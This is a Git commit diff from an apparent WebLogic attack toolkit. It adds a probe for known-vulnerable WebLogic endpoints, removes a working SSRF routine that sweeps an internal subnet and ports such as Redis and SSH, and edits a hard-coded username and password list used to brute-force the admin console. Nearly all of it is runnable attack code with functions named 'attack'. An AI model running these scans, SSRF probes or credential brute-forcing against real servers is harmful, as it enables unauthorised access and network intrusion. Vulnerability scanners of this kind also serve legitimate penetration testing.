1120362990/vulnerability-list
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

[+]增加weblogic常见页面检测

Browse Source
This commit is contained in:
rpkr
2019-10-22 20:11:10 +08:00
parent 059ba083b2
commit a1adc1a809
4 changed files with 45 additions and 28 deletions
Download Patch File Download Diff File Expand all files Collapse all files

40
weblogic/Common_page.py Normal file
View File

@@ -0,0 +1,40 @@
# -*- coding: utf-8 -*-
import requests
'''
Usage:
moon.py -u weblogic http://127.0.0.1:8080
用来查看weblogic常见的4个页面
'''
def attack(URL):
urls = (
'/console/login/LoginForm.jsp',
'/wls-wsat/CoordinatorPortType',
'/_async/AsyncResponseService',
'/ws_utc/config.do'
)
print('[+]开始检测-Weblogic-common_page。[+]')
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
headers={"User-Agent":user_agent}
for url in urls:
url = URL + url
try:
verify_response = requests.get(url, headers=headers)
if verify_response.status_code == 200:
try:
print('[*]页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面造成误报因此添加返回长度来进行辅助判断
except Exception:
pass
else:
print('未发现页面:'+url)
continue
except Exception:
print("[-]访问页面出错!")
print('[+]检测结束-Weblogic-common_page。[+]')
print('\n')
if __name__ == "__main__":
attack()

2
weblogic/Main_weblogic.py
View File

@@ -7,9 +7,11 @@ import weblogic.ssrf
import weblogic.weblogic_weakpasswd import weblogic.weblogic_weakpasswd
import weblogic.CNVD_C_2019_48814 import weblogic.CNVD_C_2019_48814
import weblogic.CVE_2017_3506 import weblogic.CVE_2017_3506
import weblogic.Common_page
def exec(URL): def exec(URL):
weblogic.Common_page.attack(URL)
weblogic.CNVD_C_2019_48814.attack(URL) weblogic.CNVD_C_2019_48814.attack(URL)
weblogic.CVE_2017_10271.attack(URL) weblogic.CVE_2017_10271.attack(URL)
weblogic.ssrf.attack(URL) weblogic.ssrf.attack(URL)

26
weblogic/ssrf.py
View File

@@ -27,31 +27,5 @@ def attack(URL):
print('\n') print('\n')
def check():
url = "http://192.168.85.133:7001/uddiexplorer/SearchPublicRegistries.jsp"
ports = [6378, 6379, 22, 25, 80, 8080, 8888, 8000, 7001, 7002]
for i in range(1, 255):
for port in ports:
params = dict(
rdoSearch="name",
txtSearchname="sdf",
selfor="Business+location",
btnSubmit="Search",
operator="http://172.23.0.{}:{}".format(i, port))
try:
r = requests.get(url, params=params, timeout=3)
except:
pass
if 'could not connect over HTTP to server' not in r.text and 'No route to host' not in r.text:
print('[*] http://172.23.0.{}:{}'.format(i, port))
else:
pass # print('[-] http://172.23.0.{}:{}'.format(i,port))
if __name__ == "__main__": if __name__ == "__main__":
attack() attack()

5
weblogic/weblogic_weakpasswd.py
View File

@@ -13,7 +13,7 @@ def attack(URL):
#设定用于爆破的账户密码 #设定用于爆破的账户密码
a = 0 a = 0
accounts = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem'] accounts = ['WebLogic', 'weblogic', 'Oracle@123', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem']
passwds = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem','passwd'] passwds = ['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe','wlcsystem', 'wlpisystem','passwd']
for account in accounts: for account in accounts:
for passwd in passwds: for passwd in passwds:
@@ -30,7 +30,8 @@ def attack(URL):
print('[+]发现弱口令:'+account+' '+passwd+'漏洞检测结束!') print('[+]发现弱口令:'+account+' '+passwd+'漏洞检测结束!')
a = 1 a = 1
else: else:
print('[-]爆破发生错误,请检查网页是否可访问!') pass
# print('[-]爆破发生错误,请检查网页是否可访问!')
except: except:
print('[-]访问weblogic登录页面出错,漏洞检测结束!') print('[-]访问weblogic登录页面出错,漏洞检测结束!')
if a == 0: if a == 0: